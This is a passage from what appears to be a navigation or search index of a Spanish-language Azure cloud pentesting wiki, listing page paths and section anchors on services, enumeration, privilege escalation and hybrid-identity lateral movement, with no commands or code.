h.html#máquinas-virtuales","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unauth.html#servicio-vulnerable-expuesto","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unauth.html#imágenes-de-galería-pública","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unauth.html#extensiones-públicas","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.html#az---phishing-de-autenticación-por-código-de-dispositivo","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying.html#az---password-spraying","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying.html#password-spray","pentesting-cloud/azure-security/az-services/index.html#az---services","pentesting-cloud/azure-security/az-services/index.html#portales","pentesting-cloud/azure-security/az-services/index.html#solicitudes-en-bruto","pentesting-cloud/azure-security/az-services/index.html#lista-de-servicios","pentesting-cloud/azure-security/az-services/az-azuread.html#az---entra-id-azuread--azure-iam","pentesting-cloud/azure-security/az-services/az-azuread.html#información-básica","pentesting-cloud/azure-security/az-services/az-azuread.html#enumeración","pentesting-cloud/azure-security/az-services/az-azuread.html#conexión","pentesting-cloud/azure-security/az-services/az-azuread.html#inquilinos","pentesting-cloud/azure-security/az-services/az-azuread.html#usuarios","pentesting-cloud/azure-security/az-services/az-azuread.html#mfa-y-políticas-de-acceso-condicional","pentesting-cloud/azure-security/az-services/az-azuread.html#grupos","pentesting-cloud/azure-security/az-services/az-azuread.html#principales-de-servicio","pentesting-cloud/azure-security/az-services/az-azuread.html#aplicaciones","pentesting-cloud/azure-security/az-services/az-azuread.html#identidades-administradas","pentesting-cloud/azure-security/az-services/az-azuread.html#roles-de-azure","pentesting-cloud/azure-security/az-services/az-azuread.html#roles-de-entra-id","pentesting-cloud/azure-security/az-services/az-azuread.html#dispositivos","pentesting-cloud/azure-security/az-services/az-azuread.html#unidades-administrativas","pentesting-cloud/azure-security/az-services/az-azuread.html#escalación-de-privilegios-de-entra-id","pentesting-cloud/azure-security/az-services/az-azuread.html#escalación-de-privilegios-de-azure","pentesting-cloud/azure-security/az-services/az-azuread.html#mecanismos-defensivos","pentesting-cloud/azure-security/az-services/az-azuread.html#gestión-de-identidades-privilegiadas-pim","pentesting-cloud/azure-security/az-services/az-azuread.html#políticas-de-acceso-condicional","pentesting-cloud/azure-security/az-services/az-azuread.html#protección-de-identidad-de-entra","pentesting-cloud/azure-security/az-services/az-azuread.html#protección-de-contraseñas-de-entra","pentesting-cloud/azure-security/az-services/az-azuread.html#referencias","pentesting-cloud/azure-security/az-services/az-acr.html#az---acr","pentesting-cloud/azure-security/az-services/az-acr.html#información-básica","pentesting-cloud/azure-security/az-services/az-acr.html#enumerar","pentesting-cloud/azure-security/az-services/az-application-proxy.html#az---application-proxy","pentesting-cloud/azure-security/az-services/az-application-proxy.html#información-básica","pentesting-cloud/azure-security/az-services/az-application-proxy.html#enumeración","pentesting-cloud/azure-security/az-services/az-application-proxy.html#referencias","pentesting-cloud/azure-security/az-services/az-arm-templates.html#az---arm-templates--deployments","pentesting-cloud/azure-security/az-services/az-arm-templates.html#información-básica","pentesting-cloud/azure-security/az-services/az-arm-templates.html#historia","pentesting-cloud/azure-security/az-services/az-arm-templates.html#buscar-información-sensible","pentesting-cloud/azure-security/az-services/az-arm-templates.html#referencias","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#az---cuentas-de-automatización","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#información-básica","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#configuraciones","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#runbooks-y-trabajos","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#programaciones-y-webhooks","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#control-de-versiones","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#entornos-de-ejecución","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#grupos-de-trabajadores-híbridos","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#configuración-de-estado-sc","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#enumeración","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#escalación-de-privilegios-y-post-explotación","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#referencias","pentesting-cloud/azure-security/az-services/az-app-services.html#az---app-services","pentesting-cloud/azure-security/az-services/az-app-services.html#información-básica-del-servicio-de-aplicaciones","pentesting-cloud/azure-security/az-services/az-app-services.html#autenticación-básica","pentesting-cloud/azure-security/az-services/az-app-services.html#kudu","pentesting-cloud/azure-security/az-services/az-app-services.html#fuentes","pentesting-cloud/azure-security/az-services/az-app-services.html#webjobs","pentesting-cloud/azure-security/az-services/az-app-services.html#slots","pentesting-cloud/azure-security/az-services/az-app-services.html#azure-function-apps","pentesting-cloud/azure-security/az-services/az-app-services.html#enumeración","pentesting-cloud/azure-security/az-services/az-app-services.html#ejemplos-para-generar-aplicaciones-web","pentesting-cloud/azure-security/az-services/az-app-services.html#python-desde-local","pentesting-cloud/azure-security/az-services/az-app-services.html#python-desde-github","pentesting-cloud/azure-security/az-services/az-app-services.html#escalamiento-de-privilegios","pentesting-cloud/azure-security/az-services/az-app-services.html#referencias","pentesting-cloud/azure-security/az-services/az-cloud-shell.html#az---cloud-shell","pentesting-cloud/azure-security/az-services/az-cloud-shell.html#azure-cloud-shell","pentesting-cloud/azure-security/az-services/az-cloud-shell.html#características-clave","pentesting-cloud/azure-security/az-services/az-cloud-shell.html#phishing-en-cloud-shell","pentesting-cloud/azure-security/az-services/az-cloud-shell.html#encontrar-y-prohibir-cuentas-de-almacenamiento-automáticas-de-cloud-shell","pentesting-cloud/azure-security/az-services/az-cloud-shell.html#referencias","pentesting-cloud/azure-security/az-services/az-cloud-shell.html#persistencia","pentesting-cloud/azure-security/az-services/az-container-registry.html#az---container-registry","pentesting-cloud/azure-security/az-services/az-container-registry.html#información-básica","pentesting-cloud/azure-security/az-services/az-container-registry.html#permisos","pentesting-cloud/azure-security/az-services/az-container-registry.html#autenticación","pentesting-cloud/azure-security/az-services/az-container-registry.html#cifrado","pentesting-cloud/azure-security/az-services/az-container-registry.html#redes","pentesting-cloud/azure-security/az-services/az-container-registry.html#microsoft-defender-para-la-nube","pentesting-cloud/azure-security/az-services/az-container-registry.html#eliminación-suave","pentesting-cloud/azure-security/az-services/az-container-registry.html#webhooks","pentesting-cloud/azure-security/az-services/az-container-registry.html#registros-conectados","pentesting-cloud/azure-security/az-services/az-container-registry.html#ejecuciones-y-tareas","pentesting-cloud/azure-security/az-services/az-container-registry.html#cache","pentesting-cloud/azure-security/az-services/az-container-registry.html#enumeration","pentesting-cloud/azure-security/az-services/az-container-registry.html#escalación-de-privilegios-y-post-explotación","pentesting-cloud/azure-security/az-services/az-container-registry.html#referencias","pentesting-cloud/azure-security/az-services/az-container-instances-apps-jobs.html#az---container-instances","pentesting-cloud/azure-security/az-services/az-container-instances-apps-jobs.html#información-básica","pentesting-cloud/azure-security/az-services/az-container-instances-apps-jobs.html#configuraciones","pentesting-cloud/azure-security/az-services/az-container-instances-apps-jobs.html#enumeración","pentesting-cloud/azure-security/az-services/az-container-instances-apps-jobs.html#escalación-de-privilegios-y-post-explotación","pentesting-cloud/azure-security/az-services/az-cosmosDB.html#az---cosmosdb","pentesting-cloud/azure-security/az-services/az-cosmosDB.html#azure-cosmosdb","pentesting-cloud/azure-security/az-services/az-cosmosDB.html#nosql","pentesting-cloud/azure-security/az-services/az-cosmosDB.html#mongodb","pentesting-cloud/azure-security/az-services/az-cosmosDB.html#referencias","pentesting-cloud/azure-security/az-services/az-cosmosDB.html#escalación-de-privilegios","pentesting-cloud/azure-security/az-services/az-cosmosDB.html#post-explotación","pentesting-cloud/azure-security/az-services/az-cosmosDB.html#todo","pentesting-cloud/azure-security/az-services/az-defender.html#az---defender","pentesting-cloud/azure-security/az-services/az-defender.html#microsoft-defender-for-cloud","pentesting-cloud/azure-security/az-services/az-defender.html#características-clave","pentesting-cloud/azure-security/az-services/az-defender.html#microsoft-defender-easm","pentesting-cloud/azure-security/az-services/az-file-shares.html#az---file-shares","pentesting-cloud/azure-security/az-services/az-file-shares.html#información-básica","pentesting-cloud/azure-security/az-services/az-file-shares.html#niveles-de-acceso","pentesting-cloud/azure-security/az-services/az-file-shares.html#copias-de-seguridad","pentesting-cloud/azure-security/az-services/az-file-shares.html#autenticaciones-soportadas-a-través-de-smb","pentesting-cloud/azure-security/az-services/az-file-shares.html#enumeración","pentesting-cloud/azure-security/az-services/az-file-shares.html#conexión","pentesting-cloud/azure-security/az-services/az-file-shares.html#enumeración-de-almacenamiento-regular-claves-de-acceso-sas","pentesting-cloud/azure-security/az-services/az-file-shares.html#escalamiento-de-privilegios","pentesting-cloud/azure-security/az-services/az-file-shares.html#post-explotación","pentesting-cloud/azure-security/az-services/az-file-shares.html#persistencia","pentesting-cloud/azure-security/az-services/az-function-apps.html#az---function-apps","pentesting-cloud/azure-security/az-services/az-function-apps.html#información-básica","pentesting-cloud/azure-security/az-services/az-function-apps.html#diferentes-planes","pentesting-cloud/azure-security/az-services/az-function-apps.html#buckets-de-almacenamiento","pentesting-cloud/azure-security/az-services/az-function-apps.html#networking","pentesting-cloud/azure-security/az-services/az-function-apps.html#configuraciones-de-function-app--variables-de-entorno","pentesting-cloud/azure-security/az-services/az-function-apps.html#sandbox-de-funciones","pentesting-cloud/azure-security/az-services/az-function-apps.html#identidades-gestionadas--metadatos","pentesting-cloud/azure-security/az-services/az-function-apps.html#claves-de-acceso","pentesting-cloud/azure-security/az-services/az-function-apps.html#autenticación-básica","pentesting-cloud/azure-security/az-services/az-function-apps.html#implementaciones-basadas-en-github","pentesting-cloud/azure-security/az-services/az-function-apps.html#implementaciones-basadas-en-contenedores","pentesting-cloud/azure-security/az-services/az-function-apps.html#enumeración","pentesting-cloud/azure-security/az-services/az-function-apps.html#escalación-de-privilegios","pentesting-cloud/azure-security/az-services/az-function-apps.html#referencias","pentesting-cloud/azure-security/az-services/intune.html#az---intune","pentesting-cloud/azure-security/az-services/intune.html#información-básica","pentesting-cloud/azure-security/az-services/intune.html#nube---local","pentesting-cloud/azure-security/az-services/intune.html#referencias","pentesting-cloud/azure-security/az-services/az-keyvault.html#az---key-vault","pentesting-cloud/azure-security/az-services/az-keyvault.html#información-básica","pentesting-cloud/azure-security/az-services/az-keyvault.html#control-de-acceso","pentesting-cloud/azure-security/az-services/az-keyvault.html#roles-integrados-de-rbac-de-key-vault","pentesting-cloud/azure-security/az-services/az-keyvault.html#acceso-a-la-red","pentesting-cloud/azure-security/az-services/az-keyvault.html#protección-contra-eliminación","pentesting-cloud/azure-security/az-services/az-keyvault.html#enumeración","pentesting-cloud/azure-security/az-services/az-keyvault.html#escalación-de-privilegios","pentesting-cloud/azure-security/az-services/az-keyvault.html#post-explotación","pentesting-cloud/azure-security/az-services/az-logic-apps.html#az---logic-apps","pentesting-cloud/azure-security/az-services/az-logic-apps.html#información-básica","pentesting-cloud/azure-security/az-services/az-logic-apps.html#ejemplos","pentesting-cloud/azure-security/az-services/az-logic-apps.html#visualizar-una-logicapp","pentesting-cloud/azure-security/az-services/az-logic-apps.html#protección-ssrf","pentesting-cloud/azure-security/az-services/az-logic-apps.html#opciones-de-alojamiento","pentesting-cloud/azure-security/az-services/az-logic-apps.html#características-clave","pentesting-cloud/azure-security/az-services/az-logic-apps.html#flujos-de-trabajo-Únicos","pentesting-cloud/azure-security/az-services/az-logic-apps.html#enumeración","pentesting-cloud/azure-security/az-services/az-logic-apps.html#cuentas-de-integración","pentesting-cloud/azure-security/az-services/az-logic-apps.html#escalación-de-privilegios","pentesting-cloud/azure-security/az-services/az-logic-apps.html#post-explotación","pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.html#az---grupos-de-gestión-suscripciones-y-grupos-de-recursos","pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.html#grupos-de-gestión","pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.html#enumeración","pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.html#suscripciones","pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.html#enumeración-1","pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.html#grupos-de-recursos","pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.html#enumeración-2","pentesting-cloud/azure-security/az-services/az-monitoring.html#az---monitoring","pentesting-cloud/azure-security/az-services/az-monitoring.html#entra-id---logs","pentesting-cloud/azure-security/az-services/az-monitoring.html#entra-id---log-systems","pentesting-cloud/azure-security/az-services/az-monitoring.html#azure-monitor","pentesting-cloud/azure-security/az-services/az-monitoring.html#log-analytics-workspaces","pentesting-cloud/azure-security/az-services/az-monitoring.html#enumeration","pentesting-cloud/azure-security/az-services/az-monitoring.html#entra-id","pentesting-cloud/azure-security/az-services/az-monitoring.html#azure-monitor-1","pentesting-cloud/azure-security/az-services/az-mysql.html#az---bases-de-datos-mysql","pentesting-cloud/azure-security/az-services/az-mysql.html#azure-mysql","pentesting-cloud/azure-security/az-services/az-mysql.html#características-clave","pentesting-cloud/azure-security/az-services/az-mysql.html#enumeración","pentesting-cloud/azure-security/az-services/az-mysql.html#conexión","pentesting-cloud/azure-security/az-services/az-mysql.html#escalación-de-privilegios","pentesting-cloud/azure-security/az-services/az-mysql.html#post-explotación","pentesting-cloud/azure-security/az-services/az-mysql.html#todo","pentesting-cloud/azure-security/az-services/az-postgresql.html#az---bases-de-datos-postgresql","pentesting-cloud/azure-security/az-services/az-postgresql.html#azure-postgresql","pentesting-cloud/azure-security/az-services/az-postgresql.html#características-clave","pentesting-cloud/azure-security/az-services/az-postgresql.html#enumeración","pentesting-cloud/azure-security/az-services/az-postgresql.html#conexión","pentesting-cloud/azure-security/az-services/az-postgresql.html#referencias","pentesting-cloud/azure-security/az-services/az-postgresql.html#escalación-de-privilegios","pentesting-cloud/azure-security/az-services/az-postgresql.html#post-explotación","pentesting-cloud/azure-security/az-services/az-postgresql.html#todo","pentesting-cloud/azure-security/az-services/az-queue.html#az---queue-storage","pentesting-cloud/azure-security/az-services/az-queue.html#información-básica","pentesting-cloud/azure-security/az-services/az-queue.html#enumeración","pentesting-cloud/azure-security/az-services/az-queue.html#escalación-de-privilegios","pentesting-cloud/azure-security/az-services/az-queue.html#post-explotación","pentesting-cloud/azure-security/az-services/az-queue.html#persistencia","pentesting-cloud/azure-security/az-services/az-queue.html#referencias","pentesting-cloud/azure-security/az-services/az-sentinel.html#az---defender","pentesting-cloud/azure-security/az-services/az-sentinel.html#microsoft-sentinel","pentesting-cloud/azure-security/az-services/az-sentinel.html#configuración-de-microsoft-sentinel","pentesting-cloud/azure-security/az-services/az-sentinel.html#características-principales","pentesting-cloud/azure-security/az-services/az-servicebus.html#az---service-bus-enum","pentesting-cloud/azure-security/az-services/az-servicebus.html#service-bus","pentesting-cloud/azure-security/az-services/az-servicebus.html#key-concepts","pentesting-cloud/azure-security/az-services/az-servicebus.html#características-avanzadas","pentesting-cloud/azure-security/az-services/az-servicebus.html#autenticación-local","pentesting-cloud/azure-security/az-services/az-servicebus.html#regla-de-autorización--política-sas","pentesting-cloud/azure-security/az-services/az-servicebus.html#enumeración","pentesting-cloud/azure-security/az-services/az-servicebus.html#escalación-de-privilegios","pentesting-cloud/azure-security/az-services/az-servicebus.html#post-explotación","pentesting-cloud/azure-security/az-services/az-servicebus.html#referencias","pentesting-cloud/azure-security/az-services/az-sql.html#az---sql","pentesting-cloud/azure-security/az-services/az-sql.html#azure-sql","pentesting-cloud/azure-security/az-services/az-sql.html#características-de-seguridad-de-sql-server","pentesting-cloud/azure-security/az-services/az-sql.html#azure-sql-database","pentesting-cloud/azure-security/az-services/az-sql.html#características-de-seguridad-de-la-base-de-datos-sql","pentesting-cloud/azure-security/az-services/az-sql.html#instancia-administrada-de-azure-sql","pentesting-cloud/azure-security/az-services/az-sql.html#máquinas-virtuales-de-azure-sql","pentesting-cloud/azure-security/az-services/az-sql.html#enumeración","pentesting-cloud/azure-security/az-services/az-sql.html#conectar-y-ejecutar-consultas-sql","pentesting-cloud/azure-security/az-services/az-sql.html#referencias","pentesting-cloud/azure-security/az-services/az-sql.html#escalación-de-privilegios","pentesting-cloud/azure-security/az-services/az-sql.html#post-explotación","pentesting-cloud/azure-security/az-services/az-sql.html#persistencia","pentesting-cloud/azure-security/az-services/az-static-web-apps.html#az---aplicaciones-web-estáticas","pentesting-cloud/azure-security/az-services/az-static-web-apps.html#información-básica-sobre-aplicaciones-web-estáticas","pentesting-cloud/azure-security/az-services/az-static-web-apps.html#autenticación-de-despliegue","pentesting-cloud/azure-security/az-services/az-static-web-apps.html#autenticación-básica-de-la-aplicación-web","pentesting-cloud/azure-security/az-services/az-static-web-apps.html#rutas-y-roles","pentesting-cloud/azure-security/az-services/az-static-web-apps.html#identidades-administradas","pentesting-cloud/azure-security/az-services/az-static-web-apps.html#enumeración","pentesting-cloud/azure-security/az-services/az-static-web-apps.html#ejemplos-para-generar-aplicaciones-web","pentesting-cloud/azure-security/az-services/az-static-web-apps.html#escalación-de-privilegios-y-post-explotación","pentesting-cloud/azure-security/az-services/az-static-web-apps.html#referencias","pentesting-cloud/azure-security/az-services/az-storage.html#az---cuentas-de-almacenamiento-y-blobs","pentesting-cloud/azure-security/az-services/az-storage.html#información-básica","pentesting-cloud/azure-security/az-services/az-storage.html#puntos-finales-de-almacenamiento","pentesting-cloud/azure-security/az-services/az-storage.html#exposición-pública","pentesting-cloud/azure-security/az-services/az-storage.html#conectar-a-almacenamiento","pentesting-cloud/azure-security/az-services/az-storage.html#acceso-al-almacenamiento","pentesting-cloud/azure-security/az-services/az-storage.html#rbac","pentesting-cloud/azure-security/az-services/az-storage.html#claves-de-acceso","pentesting-cloud/azure-security/az-services/az-storage.html#claves-compartidas-y-claves-compartidas-lite","pentesting-cloud/azure-security/az-services/az-storage.html#shared-access-signature--sas","pentesting-cloud/azure-security/az-services/az-storage.html#soporte-sftp-para-azure-blob-storage","pentesting-cloud/azure-security/az-services/az-storage.html#características-clave","pentesting-cloud/azure-security/az-services/az-storage.html#requisitos-de-configuración","pentesting-cloud/azure-security/az-services/az-storage.html#permisos","pentesting-cloud/azure-security/az-services/az-storage.html#enumeración","pentesting-cloud/azure-security/az-services/az-storage.html#comparticiones-de-archivos","pentesting-cloud/azure-security/az-services/az-storage.html#escalamiento-de-privilegios","pentesting-cloud/azure-security/az-services/az-storage.html#post-explotación","pentesting-cloud/azure-security/az-services/az-storage.html#persistencia","pentesting-cloud/azure-security/az-services/az-storage.html#referencias","pentesting-cloud/azure-security/az-services/az-table-storage.html#az---table-storage","pentesting-cloud/azure-security/az-services/az-table-storage.html#información-básica","pentesting-cloud/azure-security/az-services/az-table-storage.html#claves","pentesting-cloud/azure-security/az-services/az-table-storage.html#enumeración","pentesting-cloud/azure-security/az-services/az-table-storage.html#escalación-de-privilegios","pentesting-cloud/azure-security/az-services/az-table-storage.html#post-explotación","pentesting-cloud/azure-security/az-services/az-table-storage.html#persistencia","pentesting-cloud/azure-security/az-services/az-virtual-desktop.html#az---escritorio-virtual","pentesting-cloud/azure-security/az-services/az-virtual-desktop.html#azure-virtual-desktop","pentesting-cloud/azure-security/az-services/az-virtual-desktop.html#grupos-de-hosts","pentesting-cloud/azure-security/az-services/az-virtual-desktop.html#hosts-de-sesión","pentesting-cloud/azure-security/az-services/az-virtual-desktop.html#grupos-de-aplicaciones","pentesting-cloud/azure-security/az-services/az-virtual-desktop.html#espacios-de-trabajo-y-conexiones","pentesting-cloud/azure-security/az-services/az-virtual-desktop.html#identidades-administradas","pentesting-cloud/azure-security/az-services/az-virtual-desktop.html#enumeración","pentesting-cloud/azure-security/az-services/az-virtual-desktop.html#privesc","pentesting-cloud/azure-security/az-services/az-virtual-desktop.html#post-exploitation--persistence","pentesting-cloud/azure-security/az-services/vms/index.html#az---máquinas-virtuales-y-red","pentesting-cloud/azure-security/az-services/vms/index.html#información-básica-sobre-redes-de-azure","pentesting-cloud/azure-security/az-services/vms/index.html#información-básica-sobre-vms","pentesting-cloud/azure-security/az-services/vms/index.html#configuraciones-de-seguridad","pentesting-cloud/azure-security/az-services/vms/index.html#discos-e-instantáneas","pentesting-cloud/azure-security/az-services/vms/index.html#imágenes-imágenes-de-galería-y-puntos-de-restauración","pentesting-cloud/azure-security/az-services/vms/index.html#recuperación-de-sitios-de-azure","pentesting-cloud/azure-security/az-services/vms/index.html#bastión-de-azure","pentesting-cloud/azure-security/az-services/vms/index.html#metadatos","pentesting-cloud/azure-security/az-services/vms/index.html#enumeración-de-vm","pentesting-cloud/azure-security/az-services/vms/index.html#ejecución-de-código-en-vms","pentesting-cloud/azure-security/az-services/vms/index.html#extensiones-de-vm","pentesting-cloud/azure-security/az-services/vms/index.html#extensiones-de-vm-relevantes","pentesting-cloud/azure-security/az-services/vms/index.html#aplicaciones-de-vm","pentesting-cloud/azure-security/az-services/vms/index.html#datos-del-usuario","pentesting-cloud/azure-security/az-services/vms/index.html#datos-personalizados","pentesting-cloud/azure-security/az-services/vms/index.html#ejecutar-comando","pentesting-cloud/azure-security/az-services/vms/index.html#escalación-de-privilegios","pentesting-cloud/azure-security/az-services/vms/index.html#acceso-no-autenticado","pentesting-cloud/azure-security/az-services/vms/index.html#post-explotación","pentesting-cloud/azure-security/az-services/vms/index.html#persistencia","pentesting-cloud/azure-security/az-services/vms/index.html#referencias","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#az---azure-network","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#información-básica","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#red-virtual-vnet-y-subredes","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#enumeración","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#grupos-de-seguridad-de-red-nsg","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#enumeración-1","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#azure-firewall","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#enumeración-2","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#tablas-de-rutas-de-azure","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#enumeración-3","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#azure-private-link","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#enumeración-4","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#puntos-de-conexión-de-servicio-de-azure","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#enumeración-5","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#diferencias-entre-service-endpoints-y-private-links","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#azure-front-door-afd-y-afd-waf","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#enumeración-6","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#azure-application-gateway-y-azure-application-gateway-waf","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#enumeración-7","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#azure-hub-spoke-y-peering-de-vnet","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#enumeración-8","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#vpn-de-sitio-a-sitio","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#enumeración-9","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#azure-expressroute","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#enumeración-10","pentesting-cloud/azure-security/az-permissions-for-a-pentest.html#az---permissions-for-a-pentest","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/index.html#az---movimiento-lateral-nube---local","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/index.html#az---movimiento-lateral-nube---local-1","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/index.html#máquinas-locales-conectadas-a-la-nube","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/index.html#tokens-y-limitaciones","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/index.html#técnicas-de-pivoting","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/index.html#referencias","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/index.html#az-ad-connect---identidad-híbrida","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/index.html#información-básica","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.html#az--sincronizando-nuevos-usuarios","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.html#sincronizando-usuarios-de-azuread-a-on-prem-para-escalar-de-on-prem-a-azuread","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.html#referencias","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-default-applications.html#az---aplicaciones-predeterminadas","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.html#az---cloud-kerberos-trust","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.html#información-básica","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.html#confianza","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.html#kerberos-tgt","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.html#ntlm","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.html#abusando-de-la-confianza-de-kerberos-en-la-nube-para-obtener-administrador-de-dominio","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.html#prerrequisitos-del-ataque","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.html#el-ataque-completo","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/federation.html#az---federación","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/federation.html#información-básica","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/federation.html#pivoting","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/federation.html#golden-saml","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/federation.html#on-prem---nube","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/federation.html#referencias","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.html#az---phs---sincronización-de-hash-de-contraseña","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.html#información-básica","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.html#pivotando","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.html#encontrando-el--servidor-de-azure-ad-connect","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.html#abusando-de-msol_","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.html#abusando-de-sync_","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.html#seamless-sso","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.html#referencias","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.html#az---pta---autenticación-passthrough","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.html#información-básica","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.html#flujo-de-autenticación","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.html#local---nube","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.html#nube---local","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.html#sso-sin-interrupciones","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.html#referencias","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.html#az---seamless-sso","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.html#información-básica","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.html#local---nube","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-